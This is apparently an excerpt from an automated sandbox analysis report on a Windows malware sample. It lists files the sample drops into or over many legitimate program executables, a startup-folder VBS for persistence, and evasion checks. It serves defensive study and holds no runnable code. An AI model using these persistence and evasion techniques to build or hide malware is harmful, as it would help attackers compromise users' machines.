              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\vds.exeJump to dropped file

              Boot Survival

              Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\TieringEngineService.exe File created: C:\System Volume Information\Heat\
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_0047A330
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00434418
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_0047A330
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00434418
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\AppVClient.exe Code function: 12_2_005352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_005352A0
              Source: C:\Windows\System32\FXSSVC.exe Code function: 15_2_009852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 15_2_009852A0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 19_2_01A352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 19_2_01A352A0
              Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 4C1025C
              Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 4CE62A4
              Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 4CD9264
              Source: C:\Users\user\AppData\Local\directory\name.exe API/Special instruction interceptor: Address: 4C1728C
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 1996
              Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 6864
              Source: C:\Windows\System32\msdtc.exe Window / User API: threadDelayed 488
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Dropped PE file which has not been started: C:\Windows\System32\sppsvc.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
              Source: C:\Users\user\AppData\Local\directory\name.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_1-85130
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-66728
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\FXSSVC.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Windows\System32\AppVClient.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe API coverage: 4.0 %
              Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 3.7 %
              Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 3.6 %
